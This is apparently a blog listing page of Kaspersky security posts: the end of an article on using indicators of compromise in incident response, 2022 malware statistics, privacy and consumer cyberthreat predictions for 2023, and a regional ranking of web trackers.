In GERT we specialize in the investigation of incidents and the main sources of information in our work are digital artifacts. By analyzing them, experts discover data that identifies activity directly related to the incident under investigation. Thus, the indicators of compromise allow experts to establish a link between the investigated object and the incident.

Throughout the entire cycle of responding to information security incidents, we use different IOCs at different stages. As a rule, when an incident occurs and a victim is contacted, we receive indicators of compromise that can serve to confirm the incident, attribute the incident to an attacker and make decisions on the initial response steps. For example, if we consider one of the most common incidents involving ransomware, then the initial artifact is the files. The IOC indicators in this case will be the file names or their extensions, as well as the hash of the sum of the files. Such initial indicators make it possible to determine the type of cryptographer, to point to a group of attackers and their characteristic techniques, tactics and procedures. They also make it possible to define recommendations for an initial response.

The next set of IOCs that we can get are indicators from the data collected by triage. As a rule, these indicators show the attackers’ progress through the network and allow additional systems involved in the incident to be identified. Mostly, these are the names of compromised users, hash sums of malicious files, IP addresses and URL links. Here it is necessary to note the difficulties that arise. Attackers often use legitimate software that is already installed on the targeted systems (LOLBins). In this case, it is more difficult to distinguish malicious launches of such software from legitimate launches. For example, the mere fact that the PowerShell interpreter is running cannot be considered without context and payload. In such cases it is necessary to use other indicators such as timestamps, user name, correlation of events.

Ultimately, all identified IOCs are used to identify compromised network resources and to block the actions of attackers. In addition, attack indicators are built on the basis of compromise indicators, which are used for preventive detection of attackers. In the final stage of the response, the indicators that are found are used to verify there are no more traces of the attackers’ presence in the network.

The result of each completed case with an investigation is a report that collects all the indicators of compromise and indicators of attack based on them. Monitoring teams should add these indicators to their monitoring systems and use them to proactively detect threats.

 
[1] A “hash” is a relatively short, fixed-length, sufficiently unique and non-reversible representation of arbitrary data, which is the result of a “hashing algorithm” (a mathematical function, such as MD5 or SHA-256). Contents of two identical files that are processed by the same algorithm result in the same hash. However, processing two files which only differ slightly will result in two completely different hashes. As a hash is a short representation, it is more convenient to designate (or look for) a given file using its hash than using its whole content.
[2] Telemetry designates the detection statistics and malicious files that are sent from detection products to the Kaspersky Security Network when customers agree to participate.
[3] Vulnerable, weak, and/or attractive systems that are deliberately exposed to Internet and continuously monitored in a controlled fashion, with the expectation that they will be attacked by threat actors. When such happens, monitoring practices enable detecting new threats, exploitation methods or tools from attackers.
[4] Hijacking of known malicious command and control servers, with cooperation from Internet hosters or leveraging threat actors errors and infrastructure desertion, in order to neutralize their malicious behaviors, monitor malicious communications, as well as identify and notify targets.
[5] NIST. Computer Security Incident Handling Guide. Special Publication 800-61 Revision 2

2022. december 1.

Kaspersky Security Bulletin 2022. Statistics

All statistics in this report are from the global cloud service Kaspersky Security Network (KSN), which receives information from components in our security solutions. The data was obtained from users who had given their consent to it being sent to KSN. Millions of Kaspersky users around the globe assist us in collecting information about malicious activity. The statistics in this report cover the period from November 2021 to October 2022, inclusive.

Figures of the year
  • During the year, 15.37% of internet user computers worldwide experienced at least one Malware-class attack.
  • Kaspersky solutions blocked 505,879,385 attacks launched from online resources across the globe.
  • 101,612,333 unique malicious URLs triggered Web Anti-Virus components.
  • Our Web Anti-Virus blocked 109,183,489 unique malicious objects.
  • Ransomware attacks were defeated on the computers of 271,215 unique users.
  • During the reporting period, miners attacked 1,392,398 unique users.
  • Attempted infections by malware designed to steal money via online access to bank accounts were logged on the devices of 376,742 users.

Fill the form below to download the Kaspersky Security Bulletin 2022. Statistics full report (English, PDF)

MktoForms2.loadForm("//app-sj06.marketo.com", "802-IJN-240", 24273, function(form) { form.onSuccess(function(values, followUpUrl){ //Take the lead to a different page on successful submit, ignoring the forms configured followUpUrl. location.href = "https://go.kaspersky.com/rs/802-IJN-240/images/KSB_statistics_2022_en_final.pdf"; //return false to prevent the submission handler continuing with its own processing return false; }); }); .googleRecaptcha { padding: 20px !important; } var GOOGLE_RECAPTCHA_SITE_KEY = '6Lf2eUQUAAAAAC-GQSZ6R2pjePmmD6oA6F_3AV7j'; var insertGoogleRecaptcha = function (form) { var formElem = form.getFormElem().get(0); if (formElem && window.grecaptcha) { var div = window.document.createElement('div'); var divId = 'g-recaptcha-' + form.getId(); var buttonRow = formElem.querySelector('.mktoButtonRow'); var button = buttonRow ? buttonRow.querySelector('.mktoButton[type="submit"]') : null; var submitHandler = function (e) { var recaptchaResponse = window.grecaptcha && window.grecaptcha.getResponse(widgetId); e.preventDefault(); if (form.validate()) { if (!recaptchaResponse) { div.setAttribute('data-error', 'true'); } else { div.setAttribute('data-error', 'false'); form.addHiddenFields({ reCAPTCHAFormResponse: recaptchaResponse, }); form.submit(); } } }; div.id = divId; div.classList.add('googleRecaptcha'); if (button) { button.addEventListener('click', submitHandler); } if (buttonRow) { formElem.insertBefore(div, buttonRow); } if (window.grecaptcha.render) { var widgetId = window.grecaptcha.render(divId, { sitekey: GOOGLE_RECAPTCHA_SITE_KEY, }); formElem.style.display = ''; } } }; function onloadApiCallback() { var forms = MktoForms2.allForms(); for (var i = 0; i < forms.length; i++) { insertGoogleRecaptcha(forms[i]); } } (function () { MktoForms2.whenReady(function (form) { form.getFormElem().get(0).style.display = 'none'; jQuery.getScript('//www.google.com/recaptcha/api.js?onload=onloadApiCallback'); }); })();
2022. november 28.

Privacy predictions 2023

Our last edition of privacy predictions focused on a few important trends where business and government interests intersect, with regulators becoming more active in a wide array of privacy issues. Indeed, we saw regulatory activity around the globe. In the US, for example, the FTC has requested public comments on the “prevalence of commercial surveillance and data security practices that harm consumers” to inform future legislation. In the EU, lawmakers are working on the Data Act, meant to further protect sensitive data, as well as a comprehensive AI legal strategy that might put a curb on a range of invasive machine-learning technologies and require greater accountability and transparency.

On the other hand, we saw the repeal of Roe vs Wade and the subsequent controversy surrounding female reproductive health data in the US as well as investigations into companies selling fine-grained commercial data and facial recognition services to law enforcement. This showed how consumer data collection can directly impact the relationships between citizens and governments.

We think the geopolitical and economic events of 2022, as well as new technological trends, will be the major factors influencing the privacy landscape in 2023. Here we take a look at the most important developments that, in our opinion, will affect online privacy in 2023.

  1. Internet balkanization will lead to more diverse (and localized) behavior tracking market and checks on cross-border data transfer.

    As we know, most web pages are crawling with invisible trackers, collecting behavioral data that is further aggregated and used primarily for targeted advertising. While there are many different companies in the business of behavioral ads, Meta, Amazon, and Google are the unquestionable leaders. However, these are all US companies, and in many regions, authorities are becoming increasingly wary of sharing data with foreign companies. This may be due to an incompatibility of legal frameworks: for example, in July 2022, European authorities issued multiple rulings stating use of Google Analytics may be in violation of GDPR.

    Moreover, the use of commercial data by law enforcement (and potentially intelligence bodies) makes governments suspicious of foreign data-driven enterprises. Some countries, such as Turkey, already have strict data localization legislation.

    These factors will probably lead to a more diverse and fragmented data market, with the emergence and re-emergence of local web tracking and mobile app tracking companies, especially on government and educational websites. While some countries, such as France, Russia, or South Korea, already have a developed web tracking ecosystem with strong players, more countries may follow suit and show a preference for local players.

    This might have various implications for privacy. While big tech companies may spend more on security than smaller players, even they have their share of data breaches. A smaller entity might be less interesting for hackers, but also faces less scrutiny from regulatory bodies.

  2. Smartphones will replace more paper documents.

    Using smartphones or other smart devices to pay via NFC (e.g., Apple Pay, Samsung Pay) or QR code (e.g., Swish in Sweden, SBPay in Russia or WeChat in China) is rapidly growing and will probably render the classic plastic debit and credit card obsolete, especially where cashless payments already dominate. COVID-19, however, showed that smartphones can also be used as proof of vaccination or current COVID-negative health status, as many countries used dedicated apps or QR codes, for example, to provide access to public facilities for vaccinated citizens.

    Why stop there? Smartphones can also be used as IDs. A digitized version of an ID card, passport or driver license can be used instead of the old-fashioned plastic and paper. In fact, several US states are already using or plan to use digital IDs and driver licenses stored in Apple Wallet.

    Having your ID stored on a phone brings both convenience as well as risks. On the one hand, a properly implemented system would, for example, allow you to verify at a store that you are of legal age to buy alcohol without brandishing the whole document with other details like name or street address to the cashier. Also digitized IDs can significantly speed up KYC procedures, for example, to apply for a loan online from a smartphone.

    On the other hand, using a smartphone to store an increasing amount of personal data creates a single point of failure, raising serious security concerns. This places serious demands on security of mobile devices and privacy-preserving ways of storing the data.

  3. Companies will fight the human factor in cybersecurity to curb insider threat and social engineering to protect user data.

    As companies deploy increasingly comprehensive cybersecurity measures moving from endpoint protection to XDR (eXtended Detection & Response) and even proactive threat hunting, people remain the weakest link. According to estimates, 91% of all cyberattacks begin with a phishing email, and phishing techniques are involved in 32% of all successful data breaches. Also, a lot of damage can be done by a disgruntled employee or a person who joined the company for nefarious purposes. The FBI has even warned recently that deep fakes can be used by those seeking remote jobs to confuse the employer, probably with the goal of gaining access to internal IT systems.

    We expect less data leaks caused by misconfiguration of S3 buckets or Elasticsearch instances, and more breaches caused by exploiting the human factor. To mitigate these threats, companies might invest in data leak prevention solutions as well as more thorough user education to raise cybersecurity awareness.

  4. We will hear more concerns about metaverse privacy – but with smartphones and IoT, aren’t we already in a metaverse?

    While skeptics and enthusiasts keep fighting over whether a metaverse is a gamechanger or just a fad, tech companies and content creators continue to polish the technology. Meta has recently announced Meta Quest Pro, and an Apple headset is rumored to appear in 2023. Some, however, raise concerns over metaverse privacy. While smartphones with their multiple sensors from accelerometers to cameras can feel quite intrusive, a VR headset is in a league of its own. For example, one of the latest VR headsets features four front-facing cameras, three cameras on each controller and several cameras to track eyes and facial expressions. This means that in a nightmare scenario such devices would not only have a very deep insight into your activity in the metaverse services provided by the platform, they may be very effective, for example, in reading your emotional reaction to ads and making inferences about you from the interior of your home — from what colors you like to how many pets and children you have.

    While this sounds scary (which is why Meta addresses these concerns in a separate blog post), the fears might actually be exaggerated. The amount of data we generate just by using cashless payments and carrying a mobile phone around during the day is enough to make the most sensitive inferences. Smart home devices, smart cities with ubiquitous video surveillance, cars equipped with multiple cameras and further adoption of IoT, as well as continuous digitalization of services will make personal privacy, at least in cities, a thing of the past. So, while a metaverse promises to bring offline experiences to the online world, the online world is already taking hold of the physical realm.

  5. Desperate to stop data leaks, people will insure against them.

    Privacy experts are eagerly giving advice on how to secure your accounts and minimize your digital footprint. However, living a convenient modern life comes with a cost to privacy, whether you like it or not: for example, ordering food deliveries or using a ride-hailing service will generate, at the very least, sensitive geodata. And as the data leaves your device, you have little control over it, and it is up to the company to store it securely. However, we see that due to misconfigurations, hacker attacks and malicious insiders, data might leak and appear for sale on the dark web or even on the open web for everyone to see.

    Companies take measures to protect the data, as breaches cause reputation damage, regulatory scrutiny and, depending on local legislation, heavy fines. In countries like the US, people use class action lawsuits to receive compensation for damages. However, privacy awareness is growing, and people might start to take preventive measures. One way to do that might be to insure yourself against data breaches. While there are already services that recoup losses in case of identity theft, we could expect a larger range of insurance offers in the future.

We have looked at several factors that, in our opinion, will most prominently affect the way data flows, and possibly leaks, between countries, businesses and individuals. As the digital world continues to permeate the physical realm, we expect even more interesting developments in the future.

2022. november 28.

Consumer cyberthreats: predictions for 2023

The consumer threat landscape constantly changes. Although the main types of threats (phishing, scams, malware, etc.) remain the same, lures that fraudsters use vary greatly depending on the time of year, current major events, news, etc. This year, we have seen spikes in cybercriminal activity aimed at users amid the shopping and back-to-school season, big pop culture events, such as Grammy and Oscar, movie premieres, new smartphone announcements, game releases, etc. The list can go on, as cybercriminals are quick to adapt to new social, political, economic, and cultural trends, coming up with new fraudulent schemes to benefit from the situation.

Below, we present a number of key ideas about what the consumer-oriented threat landscape will look like in 2023, and describe how users could be lured into cybertraps with fake content and third-party apps.

Games and streaming services

Users will face more gaming subscription fraud. Sony’s PlayStation Plus is starting to compete with Microsoft’s subscription service, GamePass, and offers to play subscription games not only on consoles, but also on the PC, to increase the market share. The larger the subscription base, the greater the number of fraudulent key-selling schemes and attempts at stealing accounts. These schemes can be very similar to the streaming scams that we have been observing for the past several years.

Gaming console shortage to be exploited. The shortage of consoles, relieved slightly in 2022, could start to increase again already in 2023, spurred by the release of the PS VR 2 by Sony. The headset, which requires a PS5 to function, will be a convincing reason for many to buy the console. A further factor is expected to be the release of “pro” console versions, rumors about which began to circulate in the middle of 2022, and which may trigger more demand than can be satisfied. Fake presale offers, generous “giveaways” and “discounts”, as well as online store clones that sell hard-to-find consoles—we expect all these types of fraud to exploit the console shortage.

In-game virtual currencies will be in demand among cybercriminals. Most modern games have introduced monetization: the sale of in-game items and boosters, as well as the use of in-game currencies. Games that include these features are cybercriminals’ primary targets as they process money directly. In-game items and money are some of the prime goals for attackers stealing players’ accounts. This summer for instance, cyberthieves stole 2 million dollars’ worth of items from an account that they hacked. To get a hold of in-game valuables, scammers may also trick their victims into a fraudulent in-game deal. In the coming year, we expect new schemes relating to resale or theft of virtual currencies and items to emerge.

Cybercriminals will capitalize on long-awaited titles. This year, we have already seen an attacker claim to leak several dozen gameplay videos from GTA 6. Chances are that in 2023, we will see more attacks relating to games slated for release in that year: Diablo IV, Alan Wake 2, and Stalker 2. Besides possible leaks, we expect to see the increase in scams that target these games, as well as in Trojans disguised as those games.

Streaming will remain cybercriminals’ bottomless source of income. Every year, streaming services produce more and more exclusive content that gets released on select platforms. A growing number of TV shows are becoming not just a source of entertainment, but a cultural phenomenon that influences fashion and trends in general. 2023 promises a wealth of new releases. We expect cybercriminals to use these anticipated titles along with streaming service names when distributing Trojans, creating phishing pages and implementing scams.

The talked-about movies and shows that could be exploited by cybercriminals include the new seasons of Euphoria and The Mandalorian; the long-awaited show starring Lily Rose Depp and The Weeknd, “The Idol”; the Barbie movie; and the post-apocalyptic drama series based on the video game “The Last of Us”. The list of potential bait films to be exploited can go on and on, since fraudsters are quick to adapt to consumer tastes. If they see that users are looking for the latest episode of a popular show, they will simply find their way to benefit from that interest.

Social media and the metaverse

New social media will bring more privacy risks. We would like to believe that the near future will see a new revolutionary phenomenon in the world of social networks. Perhaps this will happen already in VR, but rather in AR. As soon as a new trendy app appears, so do risks for its users. Cybercriminals can start distributing fake trojanized applications to infect victims’ phones for further malicious purposes. Further dangers are associated with data and money theft, as well as phishing pages aimed at hijacking accounts in the new social media. Privacy most probably will be a major concern, too, as many startups neglect to configure their applications in accordance with privacy protection best practices. This attitude may lead to a high risk of personal data compromise and cyberbullying in the new social media, however trendy and convenient it may be.

Exploitation of the metaverse. Right now, we are only taking the first steps toward complete immersion in virtual reality, already using metaverses for entertainment while testing industrial and business applications of this new technology. Although so far, there are only a few metaverse platforms, they already have revealed risks that future users will face. As the metaverse experience is universal and does not obey regional data protection laws, such as GDPR, this might create complex conflicts between the requirements of the regulations regarding data breach notification.

Virtual abuse and sexual assault will spill over into metaverses. We have already seen cases of avatar rape and abuse, despite efforts to build a protection mechanism into metaverses. As there are no specific regulation or moderation rules, this scary trend is likely to follow us into 2023.

New source of sensitive personal data for cybercriminals

Data from mental health apps will be used in accurately targeted social engineering attacks. Taking care of your mental health is no longer just some kind of whim or trend, but an absolutely necessary activity. And if, at some point, we are accustomed to the fact that the Internet knows almost everything about us, we are yet to realize that now our virtual portrait can be enriched with sensitive data about our mental state. As usage of mental health apps increases, the risk of this sensitive data being accidentally leaked or obtained by a third party through a hacked account will also grow. Armed with details on the victim’s mental state, the attacker is likely to launch an extremely precise social engineering attack. Now, imagine that the target is a key employee of a company. We are likely to see stories of targeted attacks involving data on the mental health of corporate executives. And, if you add here data, such as facial expressions and eye movement, that sensors in VR headsets collect, the leakage of that data may prove disastrous.

Education platforms and the learning process

Online education platforms will attract more cybercrime. In the post-pandemic times, online education has proven to be no less efficient than offline classes, we expect investment in online education platforms and learning management systems (LMS) to increase significantly. The trend is not new, but the relevance of concomitant threats will grow along with the growth in digitalization: trojanized files and phishing pages mimicking online educational platforms and videoconferencing services, as well as LMS credential theft are all set to grow in 2023.

A greater number of innovative technologies embedded in the learning process. These can be the use of virtual and augmented reality, voice interfaces, process automation (including robotization of communication), machine analysis of user actions, and AI-assisted testing and grading.

Gamification of education. In 2023, we will see greater use of gamification technologies in online learning to achieve functional goals: user acquisition and engagement, holding attention, personalized learning, inclusivity, and reducing resistance to learning. This will expose students to additional risks, the like of which have plagued the gaming industry, among them trolls, phishing, and bullying, on platforms built for communication, competition, and teamwork.

2022. november 25.

Who tracked internet users in 2021–2022

Every time you go online, someone is watching over you. The services you use, the websites you visit, the apps on your phone, smart TVs, gaming consoles, and any networked devices collect data on you with the help of trackers installed on web pages or in software. The websites and services send this data to their manufacturers and partners whose trackers they use. Companies are looking for all kinds of information on you: from device specifications to the way you are using a service, and the pages you are opening. Data thus collected primarily helps companies, firstly, to understand their customers better and improve the products by analyzing the user experience, and, secondly, to predict user needs and possibly even manipulate them. Besides, the more an organization knows about you, the better it can personalize ads that it shows you. These ads command higher rates than random ones and therefore generate higher profits.

Understanding who is collecting the data and why requires you to have free time and to know where to look. Most services have published privacy policies, which should ideally explain in detail what data the service collects and why. Sadly, these policies are seldom transparent enough. Worried about this lack of transparency, users and privacy watchdogs put pressure on technology companies. Certain tech giants recently started adding tools to their ecosystems that are meant to improve the data collection transparency. For example, upon the first run of an app downloaded from the App Store, Apple inquires if the user is willing to allow that app to track their activity. However, not every service provides this kind of warnings. You will not see a prompt like that when visiting a website, even if you are doing it on an Apple device.

Browser privacy settings and special extensions that recognize tracking requests from websites and block these can protect you from tracking as you surf the web. That is how our Do Not Track (DNT) extension works. Furthermore, with the user’s consent, DNT collects anonymized data on what tracking requests are being blocked and how frequently. This report will look at companies that collect, analyze, store user data, and share it with partners, as reported by DNT.

Statistics collection principles

This report uses anonymous statistics collected between August 2021 and August 2022 by the Do Not Track component, which blocks loading of web trackers. The statistics consist of anonymized data provided by users voluntarily. We have compiled a list of 25 tracking services that DNT detected most frequently across nine regions and certain individual countries. 100% in each case represents the total number of DNT detections triggered by all 25 tracking services.

DNT (disabled by default) is part of Kaspersky Internet Security, Kaspersky Total Security, and Kaspersky Security Cloud.

Global web tracking giants

Six tracking services made the TOP 25 rankings in each of the regions at hand. Four of them are owned by Google: Google Analytics, Google AdSense, Google Marketing Platform, and YouTube Analytics. The remaining two are owned by Meta and Criteo, which we will cover later.

Google

Our last report, published in 2019, took a close look at Google’s trackers: DoubleClick, Google AdSense, Google Analytics, and YouTube Analytics. This was right around the time when the search giant announced plans to rebrand the DoubleClick advertising platform and merge it with its advertising ecosystem. Today, DoubleClick is part of Google Marketing Platform, although the tracking URLs have not changed and continue to function as before. For convenience, our statistics will refer to that tracking service as “Google Marketing Platform (ex-DoubleClick)”.

Share of DNT detections triggered by Google Marketing Platform (ex-DoubleClick) trackers in each region, August 2021 — August 2022 (download)

Google Marketing Platform (ex-DoubleClick) had its largest shares in our TOP 25 rankings for South Asia (32.92%) and the Middle East (32.84%). These were followed by its shares in Africa and Latin America: 25.37% and 24.64%, respectively. The lowest share (just 7.05%) of Google Marketing Platform (ex-DoubleClick) DNT detections in our regional TOP 25 rankings of the busiest tracking services were observed in the CIS.

A further tracking service operated by Google, Google Analytics, collects data on website visitors and provides detailed statistics to clients. That service, too, accounts for a fairly large share of DNT detections across the world.

Share of DNT detections triggered by Google Analytics trackers in each region, August 2021 — August 2022 (download)

A look at the share of Google Analytics in various regions will reveal a similar pattern to the Google Marketing Platform (ex-DoubleClick). Google Analytics received its largest shares of detections in South Asia (18.04%), Latin America (17.97%), Africa (16.56%) and the Middle East (16.44%). Its smallest share was in the CIS: 9.06%.

Share of DNT detections triggered by Google AdSense trackers in each region, August 2021 — August 2022 (download)

Another tracking system operated by Google is Google AdSense context ad service. This, again, had its highest percentages in the Middle East (5.27%), Africa (4.63%), Latin America (4.44%), and South Asia (4.44%). Here, too, the CIS ranked last with just 1.45% of detections triggered by the service.

Rounding out the list of Google’s tracking services is YouTube Analytics. It provides YouTube bloggers with data on their audiences that its trackers collect and analyze.

Share of DNT detections triggered by YouTube Analytics trackers in each region, August 2021 — August 2022 (download)

The Middle East (8.04%), South Asia (7.79%), Africa (5.97%), and Latin America (5.02%) again accounted for the highest shares of detections. At the bottom of the region list this time around is North America (1.82%), rather than the CIS (2.54%). The low percentage is no indication of YouTube’s insignificant presence in the region. The small share of YouTube Analytics in the region was likely due to fierce competition among services that collect and analyze data. We will revisit this later.

Meta (Facebook)

Facebook Custom Audiences by Meta, which provides targeted advertising services, was present in each of the regions along with Google’s tracking services. Services like that collect various types of user data, analyze these, and segment the audience to ensure better ad targeting. An advertiser who uses a targeting service wins by having their products shown to the people who are the likeliest to be interested. Compared to smaller advertising providers, Facebook Custom Audiences covers a significantly larger audience. Our data shows, however, that Meta was second to Google in terms of presence in all regions of the world.

Share of DNT detections triggered by Facebook Custom Audiences trackers in each region, August 2021 — August 2022 (download)

Facebook Custom Audiences had its largest shares in Latin America (8.76%) and Oceania (7.95%), and its smallest, in the CIS (2.12%). As mentioned above, the modest shares occupied by the global trackers could be linked to serious competition from local data collection and analysis services.

Criteo

The last on the list of tracking services detected in every corner of the world was Criteo. Though a less familiar name than Google or Facebook, Criteo actually is a major French advertising company providing a range of services from collection and analysis of user data to advertising itself.

Share of DNT detections triggered by Criteo trackers in each region, August 2021 —August 2022 (download)

Criteo trackers were most frequently detected in Europe (7.07%), East Asia (6.09%), and Latin America (5.24%), and least frequently, in South Asia (just 1.59%).

Regional landscape

In addition to the tracking services detected everywhere in the world, there were players of comparable size that did appear in most, but not all, TOP 25 rankings and local giants that dominated individual regions or countries. We will cover these below.

Europe

The aforementioned global tracking services held the top three places in Europe: Google Marketing Platform (ex-DoubleClick) (21.39%), Google Analytics (15.23%), and Criteo (7.07%). Facebook Custom Audiences was fifth, with 5.29%, Google AdSense was seventh, with 3.59%, and YouTube Analytics eleventh, with 2.97%. Trackers owned by five other major companies occupied the fourth, sixth, eighth, ninth, and tenth positions in our rankings.

TOP 25 tracking services in Europe, August 2021 — August 2022 (download)

Amazon Technologies, which accounted for 6.31% of total detections associated with prevalent trackers in Europe, stands for trackers operated by Amazon Advertising, an Amazon subsidiary that collects and analyzes user data to help their clients to connect with consumers, in addition to placing ads in all Amazon services. This is essentially a classic advertising giant similar to Google Marketing Platform and Criteo. Amazon trackers will come up more than once in other regional TOP 25 rankings.

Index Exchange, the Canadian-based global advertising marketplace with a 4.12% percent share in Europe, is another such giant.

Bing Ads, with a share of 3.45%, was another tracking service popular in the region. It provides search query analysis and displays ads in the Bing search engine. It was followed by Adloox (3.21%), which we covered in the previous review, and Improve Digital (3.17%), a Dutch advertising platform.

Facebook was the fifteenth most popular tracking service in the region, with 1.96%. This is another Meta service, which tracks Facebook account activity, such as logins and interaction with plugins and Like buttons on other websites. The service features in the TOP 25 almost in every region, with the exception of North America, Russia and Iran.

Certain tracking services, such as Meetrics (DoubleVerify), with a share of 1.28%, and Virtual Minds, with a share of 1.39%, feature in the European TOP 25 only. This is hardly surprising, as both companies are headquartered in Germany.

Africa

The familiar advertising giants occupied the top four positions in Africa. Google Marketing Platform (ex-DoubleClick) had a huge share of 25.37%. Google Analytics was second, with 16.56%. YouTube Analytics and Facebook Custom Audiences were detected in 5.97% and 5.90% of total cases, respectively.

TOP 25 tracking services in Africa, August 2021 — August 2022 (download)

The fifth place was taken by Yahoo Web Analytics, with a share of 4.86%. This is a service that collects and analyzes data on Yahoo users. The presence of Yahoo Web Analytics in a regional TOP 25 is an indication that Yahoo services are popular in that region.

It is worth noting that the African TOP 25 included none of the tracking services popular in that region exclusively.

The Middle East

The six global tracking services occupied the top six positions in the Middle East. Google Marketing Platform (ex-DoubleClick) accounted for almost one-third (32.84%) of the total detections of the region’s most popular tracking services. Google Analytics trackers were detected in 16.44% of cases; YouTube Analytics trackers, in 8.04%; аnd Google AdSense trackers, in 5.27%. Google is evidently the biggest collector of user data in the Middle East.

TOP 25 tracking services in the Middle East, August 2021 — August 2022 (download)

There is a certain country in the region whose TOP 25 statistics we would like to consider separately because of a unique advertising market and hence, an online tracking landscape different from the rest of the Middle East.

Iran

Iran is the only country on our list where Google Analytics accounted for 50.72% of the total detections associated with the 25 leading tracking services. Google Marketing Platform (ex-DoubleClick) accounted for 11.76%.

TOP 25 tracking services in Iran, August 2021 — August 2022 (download)

Iran also has local tracking services that internet users there encounter fairly often. For instance, the advertising agency SabaVision, with a share of 4.62%, was third in the rankings and the advertising platform Yektan was fifth, with 3.90%.

Latin America

The tracking landscape in Latin America was not drastically different from the rest of the world. Again, Google, Facebook, and Criteo occupied the leading positions. They were followed by Yahoo Web Analytics (3.48%), trackers operated by the US analytics company Chartbeat (3.00%), Twitter (2.65%), and Amazon Technologies (2.62%).

TOP 25 tracking services in Latin America, August 2021 — August 2022 (download)

North America

The share of Google’s global tracking services was comparatively small in North America, as the charts in the first part of this report show. Google Marketing Platform (ex-DoubleClick) accounted for 18.22% of total detections in August 2021 — August 2022, which was the second smallest figure in terms of its regional shares. The North American share of YouTube Analytics trackers was their smallest altogether. This was due to the heavy presence of trackers operated by other companies: Amazon Technologies (6.90%), Yahoo Web Analytics (5.67%), and Adloox (5.57%). These companies created a more competitive environment, which resulted in the share of each tracking service in the total DNT detections being smaller.

TOP 25 tracking services in North America, August 2021 — August 2022 (download)

In addition to other regions’ leaders, the North American TOP 25 featured a few that only made the local rankings. Examples included the Canadian advertising ecosystem Sharethrough with a share of 1.99% and the American advertising company The Trade Desk, which accounted for 1.65% of the detections.

Oceania

Every well-known global web tracking service was represented in Oceania. Interestingly enough, Oceania and North America were the only two regions where trackers by Tremor Video, a company that specializes in video advertising, made their way into the TOP 25, with the shares of 1.15% and 2.54%, respectively.

TOP 25 tracking services in Oceania, August 2021 — August 2022 (download)

The CIS

The CIS (Commonwealth of Independent States) is a fairly interesting region that has a variety of local tracking services. It comprises diverse countries, each with its distinctive internet regulations and restrictions, which certainly affects the presence of advertising companies. We will start by looking at the aggregate statistics for the CIS exclusive of Russia, as that country dominates the market, distorting other countries’ statistical data somewhat.

TOP 25 tracking services in the CIS (excluding Russia), August 2021 — August 2022 (download)

The CIS was the only region at hand dominated by a local internet giant, rather than the Google Marketing Platform (ex-DoubleClick). Yandex.Metrika, with a share of 19.24%, topped the rankings of trackers popular in the region. Google’s tracking services occupied second (16.17%) and third (13.14%) places.

The Mediascope research company was fourth, with 5.55%. Besides collecting and analyzing user data for marketing purposes, Mediascope is the organization officially designated to evaluate the size of television channel audiences, and sending reports to Roskomnadzor, Russia’s mass media regulator.

Other tracking services specific to the CIS are the web counter Yadro.ru (4.88%), the ad management platform AdFox (4.68%), Russian ad tech company Buzzoola (3.03%), the ad management and audit service Adriver (2.74%), Between Digital (2.23%), Rambler Internet Holdings (1.95%), VK (ex-Mail.Ru Group, 1.92%), VKontakte (1.86%), AdMixer (1.70%), originally from Russia but now headquartered in London, and Uniontraff.com (1.03%).

Thus, 12 out of 25 most widely used web tracking services in the CIS (exclusive of Russia) were endemic to the market.

Russian Federation

Most of the tracking services that made the TOP 25 in Russia are homegrown. Yandex.Metrika and Mediascope, mentioned above, were first and second, respectively, with 19.73% and 12.51%. Google Analytics (8.83%) and Google Marketing Platform (ex-DoubleClick, 6.59%) occupied the third and fourth positions, their respective shares fairly low in comparison to the Russia-less CIS average of 13.14% and 16.17% respectively. The rest of the top positions went to local Russian tracking services.

TOP 25 tracking services in Russia, August 2021 — August 2022 (download)

East Asia

The East Asian landscape did not differ drastically from the rest of the world. It featured mostly the same tracking services as other parts of the globe. However, there were two exceptions: Japan and Korea. We singled out these countries as separate research entities to demonstrate their distinctive features and the maturity of local advertising companies, which were, by and large, the key user data collectors and analysts there.

Google Marketing Platform (ex-DoubleClick) featured quite prominently in the East Asian TOP 25 rankings with a 27.62% share, followed by Google Analytics (16.13%) and Facebook Custom Audiences (6.65%). YouTube Analytics had a share of 6.54%, and Yahoo Web Analytics, 5.79%.

TOP 25 tracking services in East Asia (excluding Japan and Korea), August 2021 — August 2022 (download)

Japan

Japan is the only country where Twitter trackers had a fairly high share (11.67%), overtaking both Facebook Custom Audiences (4.43%) and YouTube Analytics (3.24%). Similarly to other major social networks, Twitter tracks user activity on other websites in addition to its own. One of the tracking tools is Twitter Pixel, which owners can embed into their websites. Twitter trackers notably featured in the TOP 25 rankings of every region and country covered by the report, with the exception of Russia, where this service is blocked.

TOP 25 tracking services in Japan, August 2021 — August 2022 (download)

In addition to the global companies, the TOP 25 rankings for Japan featured local tracking services. Examples include trackers operated by the Japanese marketing and advertising agencies, such as Digital Advertising Consortium Inc (3.01%), Supership (2,86%), I-mobile (2.13%), AdStir (1.44%), Samurai Factory (0.99%), Logly (0.90%), the blogging platform Ameba (1.47%), and the online services vendor LINE Corporation (0.71%).

South Korea

Like Japan, South Korea is a peculiar region with mature local tech companies, which affects tracker distribution. Google led by a fairly wide margin: Google Marketing Platform (ex-DoubleClick) had a share of 25.49% and Google Analytics 19.74%. Trackers operated by Kakao, Korea’s largest internet company, accounted for as much as 10.90%, pushing it to third place. Kakao’s scale of operations is comparable to Japan’s LINE, Russia’s Yandex or China’s WeChat.

TOP 25 tracking services in South Korea, August 2021 — August 2022 (download)

Other Korean tracking services in the TOP 25 were eBay Korea (2.02%) and the targeted advertising service WiderPlanet (1.77%).

South Asia

The South Asian TOP 25 rankings of web tracking services most frequently detected by DNT looked similar to the general global pattern. As in the Middle East, Google Marketing Platform (ex-DoubleClick) had one of the highest shares globally in South Asia, 32.92%.

TOP 25 tracking services in South Asia, August 2021 — August 2022 (download)

The Indian tech and media giant Times Internet, which was not part of the TOP 25 in any other region of the world, had some presence in South Asia (0.97%).

Conclusion

There are only a few global companies that collect user data in every corner of the world. They are the universally recognized Google and Meta, as well as the advertising giant Criteo, little known to common users. We have seen that the more distinctive the region or country is linguistically, economically, and technologically, the higher the chances are that local companies will have some presence on the market and be able to compete with the global giants. Major local players typically go beyond just advertising and marketing to be providers of diverse online services on their home markets. For example, Korea’s Kakao, Japan’s LINE, and Russia’s Yandex are not just internet giants but key regional services that provide the population with all that it needs: from email and instant messaging to food delivery. As they collect and analyze user data, they naturally pursue the same objectives as the global giants.

